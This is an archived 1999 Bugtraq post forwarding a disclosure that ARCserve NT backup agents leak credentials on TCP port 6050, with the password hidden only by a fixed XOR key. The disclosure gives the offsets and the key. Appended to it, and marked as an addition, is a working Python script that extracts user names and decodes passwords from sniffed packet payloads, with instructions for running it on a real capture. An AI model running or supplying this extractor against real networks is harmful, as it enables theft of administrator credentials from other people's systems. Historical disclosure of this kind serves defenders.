Bugtraq mailing list archives

Severe Security Hole in ARCserve NT agents (fwd)


From: weld () L0PHT COM (Weld Pond)
Date: Sun, 21 Feb 1999 21:19:42 -0500


---------- Forwarded message ----------
Date: Sun, 21 Feb 1999 17:44:55 -0500
From: ELVIS <LEEEEEECH () msn com>
To: news () rootshell com
Cc: hotnews () l0pht com, CAI <support () cai com>, security () microsoft com
Subject: Severe Security Hole in ARCserve NT agents


This is absolutely pathetic.

You can obtain user names and passwords used by ARCserve NT agents when an
NT system is backed up over a TCP/IP network.  Usually, for complete access
to the system, these accounts will be granted administrator rights.  This
only affects the "stock" NT agents.  The Exchange and SQL backup agents
appear to use NTLANMAN authentication (which has its own problems).  There
are probably similar exploits available over IPX/SPX and NetBEUI, but this
note only covers TCP/IP.

Set your sniffer (Network Monitor from Systems Management Server will do)
to listen for TCP/IP packets directed to port 6050 (17A2 hex).  This will
be the ARCserve server connecting to the remote client.  The third packet
you get is the one you want.

The user name will be at offset 0x00EE in clear ASCII text.

The password will be at offset 0x011E.  Simply XOR these bytes with the
ASCII values of the string "Ambuf1,et(0,21)", minus quotes of course, to
get the PLAIN TEXT password!

ACK!  YOU THOUGHT MICROSOFT WAS BAD!!!!  GAG!  BARF!  These people SHOULD
BE ASHAMED OF THEMSELVES!!!!

If you bother to search, you will find "Ambuf1,et(0,21)" in no less than 17
ARCserve EXEs and DLLs.

It is suggested that all ARCserve customers cease using the NT agents
immediately if not sooner.
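The recovery step the post describes, as an added example that is not part of the original message or of any Computer Associates code: a decoder that takes the payload of the third server-to-agent packet on TCP/6050, reads the user name at 0x00EE and the XOR-obfuscated password at 0x011E, and removes the fixed key "Ambuf1,et(0,21)". The post does not say how the fields are terminated or what happens past 15 password characters, so this example assumes both fields are NUL-terminated ASCII and that the key repeats; `build_packet()` constructs a payload in that layout so the decoder runs offline, and it is not a real capture.

```python
"""
Added example, not from the original post or CA's code: recover ARCserve
NT agent credentials from the payload of the third packet the server sends
to the agent on TCP/6050, using the two offsets and the fixed XOR key the
advisory quotes.

Assumptions made here (the post does not state them):
  * both fields are ASCII and NUL-terminated;
  * the 15-byte key repeats for passwords longer than 15 characters;
  * build_packet() CONSTRUCTS a payload with that layout for offline use,
    it is not a real capture.
"""
from itertools import cycle
from typing import Optional, Tuple

XOR_KEY = b"Ambuf1,et(0,21)"   # string present in the ARCserve EXEs/DLLs
USER_OFFSET = 0x00EE           # clear-text user name
PASS_OFFSET = 0x011E           # XOR-obfuscated password
ARCSERVE_AGENT_PORT = 6050     # 0x17A2, destination port to filter on


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR data against the repeating key; XOR is symmetric, so this
    both obfuscates and de-obfuscates."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def read_cstring(buf: bytes, offset: int, max_len: int = 256) -> bytes:
    """Return the bytes from offset up to the first NUL (assumed terminator)."""
    end = buf.find(b"\x00", offset, offset + max_len)
    if end == -1:
        raise ValueError("no NUL terminator near offset 0x%X" % offset)
    return buf[offset:end]


def extract_credentials(payload: bytes,
                        pass_len: Optional[int] = None) -> Tuple[str, str]:
    """Pull (user, password) out of one ARCserve agent packet payload.

    pass_len: pass the password length explicitly when it is known. A
    plaintext character equal to the key byte at its position XORs to
    0x00, which the NUL-terminated heuristic would misread as end of field.
    """
    if len(payload) < PASS_OFFSET + 1:
        raise ValueError("payload too short to hold the password field")
    user = read_cstring(payload, USER_OFFSET)
    if pass_len is None:
        obfuscated = read_cstring(payload, PASS_OFFSET)
    else:
        obfuscated = payload[PASS_OFFSET:PASS_OFFSET + pass_len]
    return user.decode("ascii"), xor_with_key(obfuscated).decode("ascii")


def build_packet(user: bytes, password: bytes, total_len: int = 0x180) -> bytes:
    """CONSTRUCTED payload in the layout the advisory describes: zero
    filler, user name at 0xEE, XOR-ed password at 0x11E, both NUL-terminated."""
    buf = bytearray(total_len)
    buf[USER_OFFSET:USER_OFFSET + len(user)] = user
    obf = xor_with_key(password)
    buf[PASS_OFFSET:PASS_OFFSET + len(obf)] = obf
    return bytes(buf)


if __name__ == "__main__":
    pkt = build_packet(b"backupsvc", b"Winter-1999!")
    print(extract_credentials(pkt))          # ('backupsvc', 'Winter-1999!')
    # Edge case: a password that starts like the key XORs to NUL bytes.
    tricky = build_packet(b"backupsvc", b"Ambuf1")
    print(extract_credentials(tricky))       # ('backupsvc', '')  truncated
    print(extract_credentials(tricky, 6))    # ('backupsvc', 'Ambuf1')
```

To feed it a real capture, save the TCP payload of the third packet with destination port 6050 as raw bytes and pass it to `extract_credentials()`; the length-parameter path exists because a fixed single key makes XOR a bijection per position, so any password character that coincides with the key byte at that position produces a zero byte and a terminator-based reader stops early.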


